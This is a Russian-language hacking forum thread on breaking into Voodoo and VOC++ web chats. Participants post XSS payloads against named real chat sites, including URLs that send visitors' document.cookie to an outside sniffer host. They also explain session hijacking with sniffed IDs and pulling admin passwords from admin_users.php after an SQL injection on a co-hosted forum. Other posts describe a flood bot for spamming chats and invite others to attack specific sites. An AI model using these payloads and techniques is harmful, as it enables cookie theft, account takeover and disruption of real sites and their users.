Чаты Voodoo чаты

Discussion in 'Веб-уязвимости' started by bugaga, 27 Nov 2005.

  1. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
    Народ, помогите пожалуйста с http://chat.gtn.ru
    там есть
    Code:
    http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/) 
    формирую запрос:
    Code:
    http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie 
    но на сниф ничего не приходит.
    так-же там есть
    Code:
    http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(document.cookie);%3C/script%3E> 
    формирую запрос:
    Code:
     http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script>
    На снифере никакого эффекта. Пусто.

    Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..
     
  2. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    schut123 ты куки не поимешь..ибо в вуду там сессия идёт.......вообщем хсс не катит......
     
  3. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
    А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
    Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
     
  4. _Sniper_

    _Sniper_ Banned

    Joined:
    21 Jul 2007
    Messages:
    409
    Likes Received:
    147
    Reputations:
    -17
    Раньше спичкой разрывал чаты такие. Пихаеш спичку в ENTER и ждёш..
     
  5. schut123

    schut123 Elder - Старейшина

    Joined:
    2 Jan 2007
    Messages:
    73
    Likes Received:
    49
    Reputations:
    1
    Ну а по делу кто-нибудь скажет что-нибудь?
     
  6. goodkit

    goodkit Member

    Joined:
    19 May 2006
    Messages:
    160
    Likes Received:
    30
    Reputations:
    2
    По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.
     
  7. Neorin

    Neorin Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    48
    Likes Received:
    15
    Reputations:
    0
    дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды
    /home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде ,
    <?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?>

    самый простой способ!)
     
  8. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    22
    Likes Received:
    25
    Reputations:
    -1
    привет парни! у меня проблема из таким чатом!!! я не могу восползоватса сесией !я из Укр. я перехватил сесию и немогу ей воспользоватса!!
     
    #228 bloodAngel, 8 Jun 2008
    Last edited: 16 Dec 2008
  9. F3x111TsSL

    F3x111TsSL Elder - Старейшина

    Joined:
    23 Jun 2008
    Messages:
    39
    Likes Received:
    3
    Reputations:
    0
    получал доступ по ИД сессии
    ИД получал при помощи снифера :)
    все просто

    очень жаль что чат который меня интересует при смене пароля требует старый пароль поэтому даже с панели управления ник не угнать. только напакостить можно

    давайте вместе подумаем как обойти подтверждение старого пароля при смене оного
     
  10. Invision

    Invision New Member

    Joined:
    24 Aug 2008
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Вот убитый чат: http://pro-chat.tomsk.ru
    перфикс chat/ - работает на voodoo =)
     
  11. NModern

    NModern New Member

    Joined:
    9 Dec 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    кто может дать сниффер????



    дам мазгадёра для воодоо.

    принцип работы: автоматом заходит на чат и выходит из чата

    а в чате пишется например

    12:01:01 Вася зашел
    12:01:02 Вася вышел
    12:01:03 Вася зашел
    12:01:04 Вася вышел

    и этим чат заполняется

    а админ не может выгнат потому что сессия каждый раз меняется

    можно выгнать через offban если есть
    _________________________

    и почему никто не пишет что если захватить сессию можно и "voc.php?session=сессия" написать и зайти. откроется весь чат а не только sender.php

    и есть кто нибудь с кем можно было бы посаветоватся по темам ява, пхп
     
  12. Nitrogeniys

    Nitrogeniys Member

    Joined:
    25 Dec 2008
    Messages:
    16
    Likes Received:
    5
    Reputations:
    0
    Лучше залей на сайт снифер в место авы и сиди болдей!
     
  13. Sheffavenger

    Sheffavenger New Member

    Joined:
    24 Dec 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    так как С VOC++ Business Special Edition рабочие взломы админки есть?или никто ещё непридумал? :)
     
  14. Giiiiig

    Giiiiig New Member

    Joined:
    11 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    skajite rebiata shtoza versia

    http://www.akoce.com


    i kak mne dastats hash admina ia sdelal

    xss no kinul mne svou hash no ia xochu hash admina

    voobshem versiu skajite ((
     
  15. SmоrK

    SmоrK Member

    Joined:
    19 Jan 2009
    Messages:
    27
    Likes Received:
    15
    Reputations:
    0
    обычный вуду тока с обложкой красиваой! ;)
    язык на чате фиг его знает орабский какойто! :D
    версия 0.18.16
    -=-=-=-=-=-=-=-=-=

    NModern закинь сюда мазгадёра

    а в чате пишется например

    12:01:01 Вася зашел
    12:01:02 Вася вышел
    12:01:03 Вася зашел
    12:01:04 Вася вышел

    и этим чат заполняется
     
    #235 SmоrK, 8 Feb 2009
    Last edited: 8 Feb 2009
  16. gold_555

    gold_555 New Member

    Joined:
    14 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет! Ребят, протестите плиз вот этот чат http://licey24.lipetsk.ru/chat Админ полный ламер, недавно хоть догодался закрыть директорию http://licey24.lipetsk.ru/data через .htaccess
     
  17. gold_555

    gold_555 New Member

    Joined:
    14 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

    Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

    file.html содержит следующий код
    PHP:
    <a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a>
    Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

    Такое реально???
     
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Правильнее будет на снифере сделать переадресацию
    Когда юзер уже зайдёт на него
     
  19. .-=:KiLLing:=-.

    Joined:
    4 May 2009
    Messages:
    29
    Likes Received:
    8
    Reputations:
    0
    так для VOC++ никто ничего существенного и не нашёл?
    VOC++ рулит!
     
  20. .-=:KiLLing:=-.

    Joined:
    4 May 2009
    Messages:
    29
    Likes Received:
    8
    Reputations:
    0
    а флудера так и нет рабочего? на Voc++ бизнес едишен ни 1 флудер из сдешних неработает) ещё недавно гдето тут был программой (не скриптом) флудер! работал ещё! сейчас зашёл хотел приколоться в стареньком чате) ан нет! тоже не работает)))) ну что мож кто что подскажет? ;)